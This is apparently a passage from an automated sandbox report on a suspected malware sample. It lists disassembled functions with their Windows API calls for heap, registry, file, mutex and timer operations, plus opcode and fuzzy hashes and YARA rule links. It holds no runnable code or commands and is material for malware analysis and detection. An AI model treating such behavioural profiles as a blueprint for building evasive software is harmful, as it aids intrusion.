SetLastError.KERNEL32(00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0374094A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 3a73e7c69d112be25a5c5bbfedea939ef73a6c719beae81d4fb7cd5b5506cfe9
Instruction ID: dd122104d48f71c8857d79735e6cf7d105b218b6ba041c4d5700312952eb397c
Opcode Fuzzy Hash: 3a73e7c69d112be25a5c5bbfedea939ef73a6c719beae81d4fb7cd5b5506cfe9
Instruction Fuzzy Hash: 29F08C33208325BBD7266BA3AC48F9BBF68FB58711F118404F70991048C7B9C8909B95

Uniqueness

Uniqueness Score: -1.00%

Function 03750B3C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 03750BE7
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 03750BFA
lstrcpy.KERNEL32(00000004,?), ref: 03750C18
HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 03750C3C

Strings

W, xrefs: 03750B52

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrcpylstrlen
String ID: W
API String ID: 1437807458-655174618
Opcode ID: 6f2d9fd545b9a0cdd1b2fce7c2eeb317b118fcf50be26f825edb8c0853eae235
Instruction ID: 103a4a3e50dc74dbe86305e6da4207146c216dda86adc0b478ff3c275b0b6d36
Opcode Fuzzy Hash: 6f2d9fd545b9a0cdd1b2fce7c2eeb317b118fcf50be26f825edb8c0853eae235
Instruction Fuzzy Hash: 26317075900358FFCB19EFA8CC88E9E7BF8EF09740F148059F90997254D7B499419B60

Uniqueness

Uniqueness Score: -1.00%

Function 03740465, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03740487

Part of subcall function 03740179: RtlNtStatusToDosError.NTDLL(00000000), ref: 037401B1
Part of subcall function 03740179: SetLastError.KERNEL32(00000000), ref: 037401B8

GetLastError.KERNEL32(?,00000318,00000008), ref: 03740597

Part of subcall function 03746C90: RtlNtStatusToDosError.NTDLL(00000000), ref: 03746CA8

memcpy.NTDLL(00000218,03752890,00000100,?,00010003,?,?,00000318,00000008), ref: 03740516
RtlNtStatusToDosError.NTDLL(00000000), ref: 03740570

Strings

, xrefs: 037404DD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 3469a89abb1a24f661b0a50253f2efb9892f30aed3bfbb9b129c7a1833de6266
Instruction ID: c2b93d95799ab3e10f211d0147cbe64a657f2b41194b2086bcf3779bfde7d120
Opcode Fuzzy Hash: 3469a89abb1a24f661b0a50253f2efb9892f30aed3bfbb9b129c7a1833de6266
Instruction Fuzzy Hash: AA3170B1901309EFDB24DF64D988AAAF7B8EB04304F1445AAE64AD7240E770FA44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0373A2C9, Relevance: 7.7, APIs: 5, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0373A348
wsprintfA.USER32 ref: 0373A42A
memcpy.NTDLL(00000000,?,?), ref: 0373A477
InterlockedExchange.KERNEL32(037580A8,00000000), ref: 0373A493
HeapFree.KERNEL32(00000000,00000000), ref: 0373A4D4

Part of subcall function 0374BE15: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0374BE3E
Part of subcall function 0374BE15: memcpy.NTDLL(00000000,?,?), ref: 0374BE51
Part of subcall function 0374BE15: RtlEnterCriticalSection.NTDLL(037583A8), ref: 0374BE62
Part of subcall function 0374BE15: RtlLeaveCriticalSection.NTDLL(037583A8), ref: 0374BE77
Part of subcall function 0374BE15: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0374BEAF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 119082218-0
Opcode ID: 15ed251d720b8f2a1b6eedcfd871f3fa7e71f63e5d9d3c4b50524d2370e618aa
Instruction ID: 9237d666f8ef0cea7207a9468d1a3f61126b55a1c627acdec5a031daac7cf786
Opcode Fuzzy Hash: 15ed251d720b8f2a1b6eedcfd871f3fa7e71f63e5d9d3c4b50524d2370e618aa
Instruction Fuzzy Hash: 4661AE72A00209EFCF48EFA4DC85EAE7BB9FB09300F188029E815D7241D7B89A55DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0374C594, Relevance: 7.7, APIs: 5, Instructions: 157registryfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0373C9C5: RegCloseKey.ADVAPI32(?), ref: 0373CA4C

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0374C704

Part of subcall function 037401C9: lstrlenW.KERNEL32(?,00000000,?,03757FE8,?,?,03731634,00000000,?,?,00000000,?,?,?), ref: 037401D5
Part of subcall function 037401C9: memcpy.NTDLL(00000000,?,00000000,00000002,?,03757FE8,?,?,03731634,00000000,?,?,00000000,?,?,?), ref: 037401FD
Part of subcall function 037401C9: memset.NTDLL ref: 0374020F

Part of subcall function 0374AE8B: lstrlenW.KERNEL32(00000000,00000000,?,03748E84,00000000,?,?,00000000,00001000,00000000,00000000,00001000), ref: 0374AE9E
Part of subcall function 0374AE8B: lstrlen.KERNEL32(00001000,?,03748E84,00000000,?,?,00000000,00001000,00000000,00000000,00001000), ref: 0374AEA9
Part of subcall function 0374AE8B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0374AEBE

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 0374C739
GetLastError.KERNEL32 ref: 0374C744
HeapFree.KERNEL32(00000000,00000000), ref: 0374C75A
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 0374C76C

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Closelstrlen$Heap$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 3434821807-0
Opcode ID: baa90a39d247a060cbcc95b3f5fdf153c17afb2a473f8657e3e30fdfa7ced768
Instruction ID: e77644fe94acbd94238526d289e39823242a74775fc385f553fd238d0ca3aa69
Opcode Fuzzy Hash: baa90a39d247a060cbcc95b3f5fdf153c17afb2a473f8657e3e30fdfa7ced768
Instruction Fuzzy Hash: 0A51AE76A0120AFFDB16EFA1DD88EAEB7BDFF05300B148069E904E7114D775AA019B61

Uniqueness

Uniqueness Score: -1.00%

Function 0373D338, Relevance: 7.6, APIs: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,03754071,?), ref: 0373D3DC
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,0374F1C8,?,?,?,?,?,00000000), ref: 0373D3F3
HeapFree.KERNEL32(00000000,00000000), ref: 0373D406
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,0374F1C8,?,?,?,?,?,00000000), ref: 0373D415
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,03754044,?,00000001,00000001,?,0374F1C8,?,?,?), ref: 0373D479

Part of subcall function 03748CC7: RtlLeaveCriticalSection.NTDLL(00000000), ref: 03748D44

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Freememcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1878246414-0
Opcode ID: f6d235bcb436d9fe954feef64d965f2625a7bcfe05991262b9a6226ca4a3eb7c
Instruction ID: fc403cd1325337fca34d4e20fd0db614d7e018174911000d0b343938bfab5a76
Opcode Fuzzy Hash: f6d235bcb436d9fe954feef64d965f2625a7bcfe05991262b9a6226ca4a3eb7c
Instruction Fuzzy Hash: E7419F35900318EFDB31EFA9CC88B9EBBA5EF0A310F158465F904AB151D774AE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0374D022, Relevance: 7.6, APIs: 5, Instructions: 126memorysynchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(037580E0,00000000,?,?,?,037323AD), ref: 0374D0AE
ResetEvent.KERNEL32(037580E4,00000000,?,?,?,037323AD), ref: 0374D0C6
HeapFree.KERNEL32(00000000,037582C0,?,?,037323AD), ref: 0374D110
RtlRemoveVectoredExceptionHandler.NTDLL(037580E8), ref: 0374D146
LocalFree.KERNEL32(?,?,037323AD), ref: 0374D19B

Part of subcall function 037474CC: GetVersion.KERNEL32(?,?,037541E8,?,0374D03A,00000000,?,?,?,037323AD), ref: 037474F0
Part of subcall function 037474CC: GetModuleHandleA.KERNEL32(?,06EB23AD,?,037541E8,?,0374D03A,00000000,?,?,?,037323AD), ref: 0374750D
Part of subcall function 037474CC: GetProcAddress.KERNEL32(00000000), ref: 03747514

Part of subcall function 03740BA3: RtlEnterCriticalSection.NTDLL(03758380), ref: 03740BAD
Part of subcall function 03740BA3: RtlLeaveCriticalSection.NTDLL(03758380), ref: 03740BE9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalFreeSection$AddressEnterEventExceptionHandleHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 837102172-0
Opcode ID: 3223243a8430d38534a74444e77d8e905930b81b329eb126c39b6fbb119eecae
Instruction ID: 2cdaa77d072d73b93eeca9b45c9694f7e2ea600381a38698ffb99ae859bb2c7b
Opcode Fuzzy Hash: 3223243a8430d38534a74444e77d8e905930b81b329eb126c39b6fbb119eecae
Instruction Fuzzy Hash: 6141B832700309BBD738FF65EC84B1A7769EB01700B098019F958D7155DBF9E841CB56

Uniqueness

Uniqueness Score: -1.00%

Function 03736032, Relevance: 7.6, APIs: 5, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03740788: RegCreateKeyA.ADVAPI32(80000001,037580C4,?), ref: 0374079D
Part of subcall function 03740788: lstrlen.KERNEL32(037580C4,00000000,00000000,0375706E,?,?,?,03739C58,00000001,00000000,?), ref: 037407C6

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,03741E7E,0374069C,00000000,00000001,03735621,00000000), ref: 037360F1
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,03741E7E,0374069C,00000000,00000001,03735621,00000000), ref: 03736157
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,03741E7E,0374069C,00000000,00000001,03735621,00000000), ref: 03736180
HeapFree.KERNEL32(00000000,0374069C,?,00000000,?,03741E7E,0374069C,00000000,00000001,03735621,00000000), ref: 03736190
RegCloseKey.ADVAPI32(03741E7E,?,00000000,?,03741E7E,0374069C,00000000,00000001,03735621,00000000), ref: 03736199

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeap$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 2002143150-0
Opcode ID: c66efdc912e36f92b6dbae4c17b3915b3fc4dbee6931f04fe2d0fde2488b6de6
Instruction ID: 32f701d49d1dbfbe279c2e9ba63b058623e3983630e74af7bd256c57125f5d16
Opcode Fuzzy Hash: c66efdc912e36f92b6dbae4c17b3915b3fc4dbee6931f04fe2d0fde2488b6de6
Instruction Fuzzy Hash: E94104B6C0020DFFDF05EF94DD848EEBBB9FB09304F14846AE511A2211D3794A959B60

Uniqueness

Uniqueness Score: -1.00%

Function 03739706, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 037463F1: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 037463FD
Part of subcall function 037463F1: SetLastError.KERNEL32(000000B7,?,0373971A), ref: 0374640E

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0373973A
CloseHandle.KERNEL32(00000000), ref: 03739812

Part of subcall function 03745F45: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03745F5F
Part of subcall function 03745F45: CreateWaitableTimerA.KERNEL32(03758168,00000003,?), ref: 03745F7C
Part of subcall function 03745F45: GetLastError.KERNEL32(?,?,0373976E,?), ref: 03745F8D
Part of subcall function 03745F45: GetSystemTimeAsFileTime.KERNEL32(?,00000000,0373976E,?,?,?,0373976E,?), ref: 03745FCD
Part of subcall function 03745F45: SetWaitableTimer.KERNEL32(?,0373976E,00000000,00000000,00000000,00000000,?,?,0373976E,?), ref: 03745FEC
Part of subcall function 03745F45: HeapFree.KERNEL32(00000000,0373976E,00000000,0373976E,?,?,?,0373976E,?), ref: 03746002

GetLastError.KERNEL32(?), ref: 037397FB
ReleaseMutex.KERNEL32(00000000), ref: 03739804

Part of subcall function 037463F1: CreateMutexA.KERNEL32(03758168,00000000,?,?,0373971A), ref: 03746421

GetLastError.KERNEL32 ref: 0373981F

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 33149873621e8afea4ba2e4a1508a8ab22580fd675638fcf8d14a6f09dbe32ce
Instruction ID: 844b15732153568cdfd812bc9ae25b43af513254b9712ddb1de77f6d965c4c95
Opcode Fuzzy Hash: 33149873621e8afea4ba2e4a1508a8ab22580fd675638fcf8d14a6f09dbe32ce
Instruction Fuzzy Hash: B331B876A00308EFC705FF75D888DAE7BB5FB8B310B244469E906DB254EBB59840CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0373ED0A, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0373ED8C
lstrcpy.KERNEL32(00000000,?), ref: 0373EDA5
lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0373EDB2
lstrlen.KERNEL32(037593A8,?,?,?,?,?,00000000,00000000,?), ref: 0373EDC4
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0373EDF5

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 28701ab1ae0b4c53e640dccea753ca98c9bac4e46d5a6d76bb23eb3d692e37a5
Instruction ID: b7199c032f60b4e3d8f72beea06752bbdafbac54391d0f455ba87dbe26d115e1
Opcode Fuzzy Hash: 28701ab1ae0b4c53e640dccea753ca98c9bac4e46d5a6d76bb23eb3d692e37a5
Instruction Fuzzy Hash: B231AE72900208FFDB15DF96CC88EEEBBB8EF45310F148064F91892245E7B89955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0373A9BB, Relevance: 7.6, APIs: 5, Instructions: 83filestringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03757FE8), ref: 0373A9D1
lstrlenW.KERNEL32(00000000), ref: 0373AA25
CloseHandle.KERNEL32(00000000), ref: 0373AA4D
DeleteFileW.KERNEL32(00000000,?,?,00000000,?,?), ref: 0373AA79
RtlLeaveCriticalSection.NTDLL(03757FE8), ref: 0373AA97

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 849222082-0
Opcode ID: d28b28d51712a4029186822dac51af79a23c2edd55e711fb35dce097cc147016
Instruction ID: 8ccb9c5c067fb67583b90c5163bb9b963d5b827ab4a5e821194da2c8aeca2ad0
Opcode Fuzzy Hash: d28b28d51712a4029186822dac51af79a23c2edd55e711fb35dce097cc147016
Instruction Fuzzy Hash: 57218372600349BFDB55EFA1DDC5E6BBBFCEF05240B144168E545E2106EBB8D9418B60

Uniqueness

Uniqueness Score: -1.00%

Function 03749C51, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 03750EA5: lstrlen.KERNEL32(?,?,?,?,0374D741,00000000,00000000,?,?), ref: 03750EB1

RtlEnterCriticalSection.NTDLL(037583A8), ref: 03749C7B
RtlLeaveCriticalSection.NTDLL(037583A8), ref: 03749C8E
GetSystemTimeAsFileTime.KERNEL32(?), ref: 03749C9F
RtlAllocateHeap.NTDLL(00000000,037583C4,?), ref: 03749D0A
InterlockedIncrement.KERNEL32(037583BC), ref: 03749D21

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: a663a2354e55d606d1e793c49bbbe8fbcdd8193cd7273adb55d52ba5413821ae
Instruction ID: d355b5544d3082747d47ee307fc16644b9a2c3a857c660b91a735fb57aba3c96
Opcode Fuzzy Hash: a663a2354e55d606d1e793c49bbbe8fbcdd8193cd7273adb55d52ba5413821ae
Instruction Fuzzy Hash: F731CE32A00305AFC728DF68D84492BB7E4FF59321F14896DFA5987240CB74E811CF92

Uniqueness

Uniqueness Score: -1.00%

Function 03739D1D, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03734F06: GetCurrentThreadId.KERNEL32 ref: 03734F3E
Part of subcall function 03734F06: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4,?,?,?,?,?,03731AC4), ref: 03734F4A
Part of subcall function 03734F06: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4), ref: 03734F58
Part of subcall function 03734F06: lstrcpy.KERNEL32(00000000), ref: 03734F7A

DeleteFileA.KERNEL32(00000000,000004D2), ref: 03739D40
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03739D49
GetLastError.KERNEL32 ref: 03739D53
HeapFree.KERNEL32(00000000,00000000), ref: 03739E12

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$Time$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemTempThreadlstrcpy
String ID:
API String ID: 855586217-0
Opcode ID: 727996d2d4ddd783caac24bd8f59883facc7faea79f5c3c79a3c1f841d26b3d9
Instruction ID: e4f5b1907be5a4fc4fc41c9877da0ab644129d7987155f6f741a043ab9c47579
Opcode Fuzzy Hash: 727996d2d4ddd783caac24bd8f59883facc7faea79f5c3c79a3c1f841d26b3d9
Instruction Fuzzy Hash: 8E21067B242318FBD254F7A0EC4CE8A33DCDF5B202B148161F709DB156E6A89505CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0373114F, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0374F31B,00000000,?,?), ref: 0373116D
GetFileSize.KERNEL32(00000000,00000000,?,?,0374F31B,00000000,?,?,?,00000000,-00000007,03732C21,-00000007,?,00000000), ref: 0373117D
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,0374F31B,00000000,?,?,?,00000000,-00000007,03732C21), ref: 037311A9
GetLastError.KERNEL32(?,?,0374F31B,00000000,?,?,?,00000000,-00000007,03732C21,-00000007,?,00000000), ref: 037311CE
CloseHandle.KERNEL32(000000FF,?,?,0374F31B,00000000,?,?,?,00000000,-00000007,03732C21,-00000007,?,00000000), ref: 037311DF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: ef1a70ea39f2e97a40ff4b6d0576c504f587c677994bd3f2a3184158eeeb4985
Instruction ID: 139e79765965e2197b699cfc1c411c9ef693f49394137a931e8b8eebd283d840
Opcode Fuzzy Hash: ef1a70ea39f2e97a40ff4b6d0576c504f587c677994bd3f2a3184158eeeb4985
Instruction Fuzzy Hash: 40110673100319BFDB20BF65DC88AEFBBADEB46360F554225FD15A7181D6708D80C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 03745E72, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000), ref: 03745EA0
GetLastError.KERNEL32 ref: 03745EC3
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03745ED6
GetLastError.KERNEL32 ref: 03745EE1
HeapFree.KERNEL32(00000000,00000000), ref: 03745F29

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 278c8fd4386e632c61e4569ed9e9d29e0c497e271f39034b5248d8f8c6f5636b
Instruction ID: d8a7e7f4078dc29e67e3c23d6e6b3aeec8ed1e6acbf77a287a0073c16f46221e
Opcode Fuzzy Hash: 278c8fd4386e632c61e4569ed9e9d29e0c497e271f39034b5248d8f8c6f5636b
Instruction Fuzzy Hash: 3821DE31600344EBEB24DB51DC88B5EBBB8EB02328FA44458F502960E4C7B9BD858B11

Uniqueness

Uniqueness Score: -1.00%

Function 03746145, Relevance: 7.6, APIs: 5, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,037323AD), ref: 03746170
memset.NTDLL ref: 037461A5
memset.NTDLL ref: 037461BC
memset.NTDLL ref: 037461D3
memset.NTDLL ref: 037461EA

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memset$SwitchThread
String ID:
API String ID: 2665758810-0
Opcode ID: 598063caaab00cba1f1c905d00b0e58cca0a0e7d76b83e30129c691843191497
Instruction ID: cb3eeabe5f5899d07d5a32c9b4a59d0f90d2450290c56d01b60ba176cf39392c
Opcode Fuzzy Hash: 598063caaab00cba1f1c905d00b0e58cca0a0e7d76b83e30129c691843191497
Instruction Fuzzy Hash: 5D11E335B41B18B7D125F729EC48D8B7E6CAFCB700B084029F501AA109CBFA150187E7

Uniqueness

Uniqueness Score: -1.00%

Function 03738E5D, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 03738E7A
memcpy.NTDLL(?,?,00000009), ref: 03738E9C
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 03738EB4
lstrlenW.KERNEL32(?,00000001,?), ref: 03738ED4
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 03738EF9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: dff176af5fee8686ff6b058e09ac81e6d3a3b1af95b9c31b99c7a17d435170dc
Instruction ID: 9e10e0014d18081626a781f9624cd087d2f3126c894fc43030127b16e7289af2
Opcode Fuzzy Hash: dff176af5fee8686ff6b058e09ac81e6d3a3b1af95b9c31b99c7a17d435170dc
Instruction Fuzzy Hash: 8D11813AD01348BBCB25EBA5DC48F8E7FB8AB09310F048051FA19D7281D6B89649DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0374BE15, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03750EA5: lstrlen.KERNEL32(?,?,?,?,0374D741,00000000,00000000,?,?), ref: 03750EB1

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0374BE3E
memcpy.NTDLL(00000000,?,?), ref: 0374BE51
RtlEnterCriticalSection.NTDLL(037583A8), ref: 0374BE62
RtlLeaveCriticalSection.NTDLL(037583A8), ref: 0374BE77
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0374BEAF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: a6e60ddb82a157c6300e9fdea28d05934767010039926945f5e70ce6673fafb5
Instruction ID: 4c7bbff52ac07e09940d2ab3a0ac2f7175d6b2b9e2d00e486b171628bf714851
Opcode Fuzzy Hash: a6e60ddb82a157c6300e9fdea28d05934767010039926945f5e70ce6673fafb5
Instruction Fuzzy Hash: FB11E977604354EFD328EF24EC88C2BB7A8EF89221B1541BDF95997240CBB59C418B61

Uniqueness

Uniqueness Score: -1.00%

Function 0373D491, Relevance: 7.6, APIs: 5, Instructions: 57memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0373D4B2
wsprintfA.USER32 ref: 0373D4CE
RegCreateKeyA.ADVAPI32(80000001,037583A0,00000000), ref: 0373D4E6
RegCloseKey.ADVAPI32(?), ref: 0373D50E
HeapFree.KERNEL32(00000000,00000000), ref: 0373D51D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCloseCreateFreewsprintf
String ID:
API String ID: 1380539425-0
Opcode ID: e75a1132190c16f69e128d09e8df5158ecb661af4aabe0bc9739aa15b03049b1
Instruction ID: b44dba36e872100adb76d20ed9d69750ed29a1a04fa4d3b86cc44d8c8d9bdd23
Opcode Fuzzy Hash: e75a1132190c16f69e128d09e8df5158ecb661af4aabe0bc9739aa15b03049b1
Instruction Fuzzy Hash: 4D11C032600308FFEB09AF94EC88EAA3B7DEB49314F108064FA08D2154D7FA8D559B60

Uniqueness

Uniqueness Score: -1.00%

Function 0373804C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 03738076
___HrLoadAllImportsForDll@4.DELAYIMP ref: 0373810F
HeapFree.KERNEL32(00000000,?,?,?), ref: 03738190

Strings

~, xrefs: 037381A1

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocDll@4FreeHeapImportsLoad
String ID: ~
API String ID: 132631613-1707062198
Opcode ID: 9fee181d83e138789a83aed28aab461d30769d1d2306511f578585e8c060cc9a
Instruction ID: 7101712cc510b22a183d65b015709c49b45d2fd0c2e9830325d7bc359c216a77
Opcode Fuzzy Hash: 9fee181d83e138789a83aed28aab461d30769d1d2306511f578585e8c060cc9a
Instruction Fuzzy Hash: D1418272A00318FFDB48FFA8DC84D5977ECFB0A204B14856AE605DB245D7B8A949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 03732AAE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 03734F06: GetCurrentThreadId.KERNEL32 ref: 03734F3E
Part of subcall function 03734F06: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4,?,?,?,?,?,03731AC4), ref: 03734F4A
Part of subcall function 03734F06: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4), ref: 03734F58
Part of subcall function 03734F06: lstrcpy.KERNEL32(00000000), ref: 03734F7A

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03732AFA
GetTickCount.KERNEL32 ref: 03732B05
GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 03732B11

Strings

\Low, xrefs: 03732ADA

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$NameTempTime$CountCreateCurrentDirectorySystemThreadTicklstrcpy
String ID: \Low
API String ID: 4108106972-4112222293
Opcode ID: 68a1855d37e312195e101d5ee68bd1604a12354ff69a956c7fd3731caa909edb
Instruction ID: c9b0bd128d34bcc38b37f16cab1ea002303c8ade5516c907bf6fe8091c73cfab
Opcode Fuzzy Hash: 68a1855d37e312195e101d5ee68bd1604a12354ff69a956c7fd3731caa909edb
Instruction Fuzzy Hash: 87014532200719BBD225FB76DC48F6B779CEF03241F194420F900D2147DBA8C8018BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0374C1A7, Relevance: 6.2, APIs: 4, Instructions: 200timeCOMMON

Download Yara Rule

APIs

